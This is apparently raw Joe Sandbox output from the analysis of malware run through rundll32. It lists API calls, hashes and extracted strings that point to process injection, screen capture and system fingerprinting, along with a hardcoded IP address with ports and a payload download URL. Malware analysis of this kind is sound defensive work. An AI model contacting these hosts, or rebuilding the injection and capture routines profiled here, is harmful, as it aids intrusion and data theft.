                              • API String ID: 2162964266-2968858985
                              • Opcode ID: 89c07fd8daf8fa2dd9149a52f704617244ee20b63103b2520ec36aebe06c20e3
                              • Instruction ID: 0317d301c40fabf3bec3093f9c03f72e67419c72de84c5b0beba167c027f4d33
                              • Opcode Fuzzy Hash: 89c07fd8daf8fa2dd9149a52f704617244ee20b63103b2520ec36aebe06c20e3
                              • Instruction Fuzzy Hash: 7753AD71908B818FD721CF25C480B9BB7E1FF89314F04896DE8895FB51EB70A949DB92

                              Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed): function 4dbde70-4dbe3cc, basic blocks calling Sleep, CloseHandle, GetLocalTime, wsprintfW, SetUnhandledExceptionFilter, EnumWindows, CreateEventA, RegOpenKeyExW, RegQueryValueExW and WaitForSingleObject.
                              APIs
                                • Part of subcall function 04DC04A0: __fassign.LIBCMT ref: 04DC0496
                              • Sleep.KERNEL32(00000000), ref: 04DBDEC4
                              • CloseHandle.KERNEL32(00000000), ref: 04DBDEF1
                              • GetLocalTime.KERNEL32(?), ref: 04DBDF09
                              • wsprintfW.USER32 ref: 04DBDF40
                              • SetUnhandledExceptionFilter.KERNEL32(04DB7530), ref: 04DBDF4E
                              • CloseHandle.KERNEL32(00000000), ref: 04DBDF67
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • EnumWindows.USER32(04DB5C50,?), ref: 04DBE0FD
                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DBE10A
                              • EnumWindows.USER32(04DB5C50,?), ref: 04DBE11E
                              • Sleep.KERNEL32(00000BB8), ref: 04DBE155
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04DBE1A1
                              • Sleep.KERNEL32(00000FA0), ref: 04DBE224
                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 04DBE24B
                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 04DBE26B
                              • CloseHandle.KERNEL32(?), ref: 04DBE2BD
                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DBE304
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DBE330
                              • CloseHandle.KERNEL32(?,?,?), ref: 04DBE337
                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DBE342
                              • CloseHandle.KERNEL32(?), ref: 04DBE360
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DBE385
                              • CloseHandle.KERNEL32(?,?,?), ref: 04DBE38C
                              • Sleep.KERNEL32(00000000,?,?,?), ref: 04DBE3A6
                              • CloseHandle.KERNEL32(?), ref: 04DBE3C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$45.204.213.99$45.204.213.99$45.204.213.99$45.204.213.99$7677$7677$7688$7699$Console$IpDatespecial
                              • API String ID: 1511462596-2426941330
                              • Opcode ID: 9d9c3fffa0c8ba2052c2a5a2833f075f7c45e9591157ab0f0f542bbca049e0c1
                              • Instruction ID: 28378ad821304ca9f1c21356f41fb348e875ce7e72b2edf5724d26c1dc38dfc6
                              • Opcode Fuzzy Hash: 9d9c3fffa0c8ba2052c2a5a2833f075f7c45e9591157ab0f0f542bbca049e0c1
                              • Instruction Fuzzy Hash: 30D1D2B0645341EFD321EF64DC95EAA7BA5FBC9704F000A1CF5969B380DB74A804CBA2

                              Control-flow Graph (graph image not reproduced)
                              APIs
                              • GetDesktopWindow.USER32 ref: 04DBBC0F
                              • GetDC.USER32(00000000), ref: 04DBBC1C
                              • CreateCompatibleDC.GDI32(00000000), ref: 04DBBC22
                              • GetDC.USER32(00000000), ref: 04DBBC2D
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 04DBBC3A
                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 04DBBC42
                              • ReleaseDC.USER32(00000000,00000000), ref: 04DBBC53
                              • GetSystemMetrics.USER32(0000004E), ref: 04DBBC78
                              • GetSystemMetrics.USER32(0000004F), ref: 04DBBCA6
                              • GetSystemMetrics.USER32(0000004C), ref: 04DBBCF8
                              • GetSystemMetrics.USER32(0000004D), ref: 04DBBD0D
                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 04DBBD26
                              • SelectObject.GDI32(?,00000000), ref: 04DBBD34
                              • SetStretchBltMode.GDI32(?,00000003), ref: 04DBBD40
                              • GetSystemMetrics.USER32(0000004F), ref: 04DBBD4D
                              • GetSystemMetrics.USER32(0000004E), ref: 04DBBD60
                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 04DBBD87
                              • _memset.LIBCMT ref: 04DBBDFA
                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 04DBBE17
                              • _memset.LIBCMT ref: 04DBBE2F
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • DeleteObject.GDI32(?), ref: 04DBBEA3
                              • DeleteObject.GDI32(?), ref: 04DBBEAD
                              • ReleaseDC.USER32(00000000,?), ref: 04DBBEB9
                              • DeleteObject.GDI32(?), ref: 04DBBF5F
                              • DeleteObject.GDI32(?), ref: 04DBBF69
                              • ReleaseDC.USER32(00000000,?), ref: 04DBBF75
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                              • String ID: ($6$gfff$gfff
                              • API String ID: 3293817703-713438465
                              • Opcode ID: 1f0cf5e62dffb0b38b7f3e6b62dc3e33128c1d42c05e771aff72130b3096e617
                              • Instruction ID: c552d341c32e2857f0466319832c9ed6d0c00c9c7ad6a1fbb1a33f4d95b5d448
                              • Opcode Fuzzy Hash: 1f0cf5e62dffb0b38b7f3e6b62dc3e33128c1d42c05e771aff72130b3096e617
                              • Instruction Fuzzy Hash: 56D13AB1E01308EFDB14DFE5E885A9EBBB9FF48700F10452AE546AB340D774A945CBA1
                              APIs
                              • SetThreadErrorMode.KERNEL32(?,00000000), ref: 6CBC39A8
                              • GetProcAddress.KERNEL32(?,?), ref: 6CBC3A21
                              • GetProcAddress.KERNEL32(?,?), ref: 6CBC3AFB
                              • GetProcAddress.KERNEL32(?,?), ref: 6CBC3BD5
                              Strings
                              • https://dcttx.com/19/7.txtFailed to download text, xrefs: 6CBC3C62
                              • Failed to download file, xrefs: 6CBC59EC
                              • NtFreeVirtualMemoryFailed to find NtFreeVirtualMemory, xrefs: 6CBC3B81
                              • */*, xrefs: 6CBC3DFC
                              • NtCreateThreadExFailed to find NtCreateThreadEx, xrefs: 6CBC3AA7
                              • NtAllocateVirtualMemoryFailed to find NtAllocateVirtualMemory, xrefs: 6CBC39CD
                              • charset, xrefs: 6CBC3FF9, 6CBC4070, 6CBC489A
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$ErrorModeThread
                              • String ID: */*$Failed to download file$NtAllocateVirtualMemoryFailed to find NtAllocateVirtualMemory$NtCreateThreadExFailed to find NtCreateThreadEx$NtFreeVirtualMemoryFailed to find NtFreeVirtualMemory$charset$https://dcttx.com/19/7.txtFailed to download text
                              • API String ID: 964953106-2649344374
                              • Opcode ID: 3ead328e1097c77ca52ea4421b05985d7463562bdb754750535ad016d3074646
                              • Instruction ID: d28c573dd20d62a10833e652650c12514e3775a75e8e3f14582f582d101af52b
                              • Opcode Fuzzy Hash: 3ead328e1097c77ca52ea4421b05985d7463562bdb754750535ad016d3074646
                              • Instruction Fuzzy Hash: A2F26A716093819FD724CF29C490BABB7E1EFC9314F10892EE8999BB51DB309949CB53
                              APIs
                              • CertFreeCertificateContext.CRYPT32(?), ref: 6CC36EDA
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC36EDD
                              • CertGetCertificateChain.CRYPT32(00000000,?,00000000,00000000,?,C0000001,00000000,00000000), ref: 6CC36F7F
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC37026
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC37049
                              • GetLastError.KERNEL32 ref: 6CC3705F
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC37091
                              • CertFreeCertificateChain.CRYPT32(?), ref: 6CC370CA
                              • CertVerifyCertificateChainPolicy.CRYPT32(00000004,?,?,00000010), ref: 6CC37144
                              • CertFreeCertificateContext.CRYPT32(?), ref: 6CC37247
                              • AcceptSecurityContext.SECUR32(?,?,?,0001011C,00000000,?,?,?,00000000), ref: 6CC3743A
                              • InitializeSecurityContextW.SECUR32(?,?,00000000,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CC374A9
                              • FreeContextBuffer.SECUR32(?), ref: 6CC374C1
                              • FreeContextBuffer.SECUR32(00000000), ref: 6CC37565
                              • FreeContextBuffer.SECUR32(?), ref: 6CC375F6
                              • CertFreeCertificateChain.CRYPT32(?), ref: 6CC376F2
                              • CertFreeCertificateContext.CRYPT32(?), ref: 6CC376FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ContextFree$CertCertificate$Chain$Buffer$Security$AcceptErrorInitializeLastPolicyVerify
                              • String ID: P(Hu$unexpected EOF during handshakeassertion failed: size >= nread
                              • API String ID: 619209709-78324864
                              • Opcode ID: 7dc3a09448bed33a2d04c64bbe66b069001c8a24368d4c75e1658141c0aa0624
                              • Instruction ID: f8cc430774f914b761b3a88491b565c8acf0f5e10c63c00542d6970d8babe80f
                              • Opcode Fuzzy Hash: 7dc3a09448bed33a2d04c64bbe66b069001c8a24368d4c75e1658141c0aa0624
                              • Instruction Fuzzy Hash: D6629870608751DFD314CF25D580B9ABBF1BF86318F10991DE8998BB81EB74E849CB92

                              Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed): function 4db6a00-4db6bd6, basic blocks calling GetCurrentProcessId, wsprintfW, GetVersionExW, GetCurrentProcess, OpenProcessToken, GetTokenInformation, GetLastError, LocalAlloc, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree and CloseHandle.
                              APIs
                              • GetCurrentProcessId.KERNEL32(00000994), ref: 04DB6A24
                              • wsprintfW.USER32 ref: 04DB6A37
                                • Part of subcall function 04DB68A0: GetCurrentProcessId.KERNEL32(B7FCE562,00000000,00000000,00000994,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68C8
                                • Part of subcall function 04DB68A0: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68D7
                                • Part of subcall function 04DB68A0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68F0
                                • Part of subcall function 04DB68A0: CloseHandle.KERNEL32(00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68FB
                              • _memset.LIBCMT ref: 04DB6A52
                              • GetVersionExW.KERNEL32(?), ref: 04DB6A6B
                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 04DB6AA2
                              • OpenProcessToken.ADVAPI32(00000000), ref: 04DB6AA9
                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04DB6ACF
                              • GetLastError.KERNEL32 ref: 04DB6AD9
                              • LocalAlloc.KERNEL32(00000040,?), ref: 04DB6AED
                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04DB6B15
                              • GetSidSubAuthorityCount.ADVAPI32 ref: 04DB6B28
                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 04DB6B36
                              • LocalFree.KERNEL32(?), ref: 04DB6B45
                              • CloseHandle.KERNEL32(?), ref: 04DB6B52
                              • wsprintfW.USER32 ref: 04DB6BAB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                              • String ID: -N/$NO/$None/%s
                              • API String ID: 3036438616-3095023699
                              • Opcode ID: 2628c30ef4bc23121bbcd2557f460fbc437b14775b2d5568fede9b60162981c8
                              • Instruction ID: 3c0d97a154b5dcb326ccd2e72e7494f90b5c0fed6203f7ba4d86f1c4fa1dbd29
                              • Opcode Fuzzy Hash: 2628c30ef4bc23121bbcd2557f460fbc437b14775b2d5568fede9b60162981c8
                              • Instruction Fuzzy Hash: C8419371A01214EFDB249F60DC99FEA7778EF09714F0041D9F68A96240DA34ED94CFA6
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC08586
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CC0860E
                              • memmove.VCRUNTIME140(?,?,00000088,?), ref: 6CC08CD6
                              • memset.VCRUNTIME140(?,000000FF,?), ref: 6CC08DF7
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CC094CF
                              • memmove.VCRUNTIME140(?,00000000,00000090), ref: 6CC099D5
                              • memmove.VCRUNTIME140(?,?,00000090), ref: 6CC09ADA
                              • memmove.VCRUNTIME140(?,?,000000F0), ref: 6CC09B83
                              • memmove.VCRUNTIME140(?,?,00000138), ref: 6CC0AC2B
                              • memmove.VCRUNTIME140(?,?,00000108), ref: 6CC0AC48
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$FreeHeapmemset
                              • String ID: C$C$Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value$connection error$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: $send stream capacity unexpectedly closedD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\io\util\write_all.rs
                              • API String ID: 217009222-2210599076
                              • Opcode ID: d2c9536805c1caaf4d7185fd1169156f551da1d9ad0eab45f31f68ef9bfc2618
                              • Instruction ID: 1a6824e64bee8304de0971e87a0111db7fe71ad1ac9be921d50015c3f75ef4e7
                              • Opcode Fuzzy Hash: d2c9536805c1caaf4d7185fd1169156f551da1d9ad0eab45f31f68ef9bfc2618
                              • Instruction Fuzzy Hash: BE434575A087818BD771CF24C4907DFB7E1BFC9308F14891EE8999B641EB71A989CB42
                              APIs
                              • GetLogicalDriveStringsW.KERNEL32(000003E8,?,00000AD4,75BF73E0,00000000), ref: 04DB80A2
                              • lstrcmpiW.KERNEL32(?,A:\), ref: 04DB80D6
                              • lstrcmpiW.KERNEL32(?,B:\), ref: 04DB80E6
                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DB8116
                              • lstrlenW.KERNEL32(?), ref: 04DB8127
                              • __wcsnicmp.LIBCMT ref: 04DB813E
                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 04DB8174
                              • lstrcpyW.KERNEL32(?,?), ref: 04DB8198
                              • lstrcatW.KERNEL32(?,00000000), ref: 04DB81A3
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                              • String ID: A:\$B:\
                              • API String ID: 950920757-1009255891
                              • Opcode ID: 58fdfcfa8d41c2fccefa7a6b6b7835fca6e156fa705adfc009f3c2e5ffb3ee08
                              • Instruction ID: ab3de4f92bb7c33fa92bdc77036775b319ec95ae724bcf43c7586ea6a6b25ab2
                              • Opcode Fuzzy Hash: 58fdfcfa8d41c2fccefa7a6b6b7835fca6e156fa705adfc009f3c2e5ffb3ee08
                              • Instruction Fuzzy Hash: B4415671A02218DBDB20EF65DD94AEEB3BCFF44710F0441D9E90AA3240E774AE05DB94
                              APIs
                              • GetDriveTypeW.KERNEL32(?,75BF73E0,00000000), ref: 04DB6C18
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 04DB6C34
                              • _memset.LIBCMT ref: 04DB6C6B
                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 04DB6C7E
                              • swprintf.LIBCMT ref: 04DB6CC3
                              • swprintf.LIBCMT ref: 04DB6CD6
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                              • String ID: %sFree%d Gb $:$@$HDD:%d
                              • API String ID: 3202570353-3501811827
                              • Opcode ID: be8e0345bb8bfeccb3caa0ee216c8d2960e31492856be17b05d3953bb07272b0
                              • Instruction ID: f76b484f73fc7577b62c921dc78f096a07f2eef8f1d3eaba0c89c20e39878950
                              • Opcode Fuzzy Hash: be8e0345bb8bfeccb3caa0ee216c8d2960e31492856be17b05d3953bb07272b0
                              • Instruction Fuzzy Hash: DA315CB2E0021CABDB14CFE5CC55FEEBBB9FB88700F50421DE906A7240EA746905CB91
                              APIs
                              • memmove.VCRUNTIME140(00000000,?,00000150), ref: 6CC1B39A
                              • memmove.VCRUNTIME140(?,00000000,00000094,?,6CCB3F94,6CCB3FDC), ref: 6CC1B585
                              • memmove.VCRUNTIME140(?,?,00000094,?,?,?,?,6CCB3F94,6CCB3FDC), ref: 6CC1B5B2
                              • memmove.VCRUNTIME140(?,?,00000094,?,?,?,?,?,?,?,6CCB3F94,6CCB3FDC), ref: 6CC1B5DC
                              Strings
                              • ALPN upgraded to HTTP/2, xrefs: 6CC1B805
                              • TryFlatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs, xrefs: 6CC22779
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC22905
                              • , xrefs: 6CC1B1A2
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC22743, 6CC22767
                              • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CC22755
                              • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs, xrefs: 6CC227AC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: $ALPN upgraded to HTTP/2$Map must not be polled after it returned `Poll::Ready`$TryFlatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-4189558408
                              • Opcode ID: a7ae9b6f6cbf898832acb169982e8da54d6f91c7b664a039fe86bf54ccc23e4e
                              • Instruction ID: 697ccaf459c9d38d50f5d62c6f957d63f8faa4aab2993ac404abba0eb36f0326
                              • Opcode Fuzzy Hash: a7ae9b6f6cbf898832acb169982e8da54d6f91c7b664a039fe86bf54ccc23e4e
                              • Instruction Fuzzy Hash: A5928B7560C7818FC325CF29C4907DAB7E1BFC9314F148A6EE5989BB81EB709949CB42
                              APIs
                              • CreateDXGIFactory.DXGI(04DD579C,?,B7FCE562,75BF73E0,00000000,00000412), ref: 04DB6ECA
                              • swprintf.LIBCMT ref: 04DB709E
                              • std::_Xinvalid_argument.LIBCPMT ref: 04DB7147
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                              • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                              • API String ID: 3803070356-257307503
                              • Opcode ID: d89a5aee4d36d88fbc374e2c6bb3784006f711477105325f31350f437b9e750f
                              • Instruction ID: 41a18e2b1ae4a6f2103a953d5bb494419b69534f179e5e3346991e71ab0301aa
                              • Opcode Fuzzy Hash: d89a5aee4d36d88fbc374e2c6bb3784006f711477105325f31350f437b9e750f
                              • Instruction Fuzzy Hash: 6AE14371B01225DFDF24DE64CC90BEEB3B5FB89700F1445A9E95AA7384D630AE818F91
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00006510), ref: 04206535
                              • GetConsoleWindow.KERNEL32(00000000), ref: 0420653D
                              • ShowWindow.USER32(00000000), ref: 04206544
                              • GetCurrentThreadId.KERNEL32 ref: 04206550
                              • PostThreadMessageA.USER32(00000000), ref: 04206557
                              • GetInputState.USER32 ref: 0420655D
                                • Part of subcall function 04205E40: _memset.LIBCMT ref: 04205E71
                              • CreateThread.KERNEL32(00000000,00000000,Function_00006120,00000000,00000000,00000000), ref: 04206577
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04206585
                              • CloseHandle.KERNEL32(?), ref: 04206591
                              • Sleep.KERNEL32(0000012C), ref: 0420659C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$Window$CloseConsoleCreateCurrentExceptionFilterHandleInputMessageObjectPostShowSingleSleepStateUnhandledWait_memset
                              • String ID:
                              • API String ID: 1910205397-0
                              • Opcode ID: 03c1ba969e12ace4f0867b769593c36ce549377d03994c49e401f609ae479601
                              • Instruction ID: 70ed8bd288487de7d729e5b9c7ac20ad2e90b4e61247d439e5149713caed7bfe
                              • Opcode Fuzzy Hash: 03c1ba969e12ace4f0867b769593c36ce549377d03994c49e401f609ae479601
                              • Instruction Fuzzy Hash: 28F06771795200BBE7516FF8FC0EB093A64FBACB02F504590B315DA1E0CEBC68808B65
                              APIs
                                • Part of subcall function 6CC59BE5: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,00000001,?,6CC39DB2), ref: 6CC59C14
                              • memmove.VCRUNTIME140(00000000,?,00000138), ref: 6CC3A3D9
                              • memmove.VCRUNTIME140(?,?,00000138), ref: 6CC3A567
                              • memmove.VCRUNTIME140(00000004,?,00000158), ref: 6CC3A606
                              Strings
                              • =, xrefs: 6CC39D6F
                              • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6CC3BA20, 6CC3BA94
                              • Failed to `Enter::block_on`, xrefs: 6CC3B953
                              • failed to park thread, xrefs: 6CC3B9EA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$CompletionCreatePort
                              • String ID: =$Failed to `Enter::block_on`$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$failed to park thread
                              • API String ID: 613624600-1090645739
                              • Opcode ID: 1ad9b2b18a17bdf7bfc6bac0351c4c044277ed3f12171b6a0159504864aaa18c
                              • Instruction ID: 045119d96bb2638879dd87021de786bac5b512def1130354673c4f71af6bf64d
                              • Opcode Fuzzy Hash: 1ad9b2b18a17bdf7bfc6bac0351c4c044277ed3f12171b6a0159504864aaa18c
                              • Instruction Fuzzy Hash: 570388716087918FC725CF29D4907AAB7F1BFC9308F14896DD88D8BB51EB309959CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CC290FF
                              • memmove.VCRUNTIME140(00000003,?,00000098), ref: 6CC2946E
                              Strings
                              • cookie2too many redirectsassertion failed: slot.is_none()D:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs, xrefs: 6CC29ADA
                              • L, xrefs: 6CC29B3C
                              • Pending error polled more than once, xrefs: 6CC29143
                              • ., xrefs: 6CC294F1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
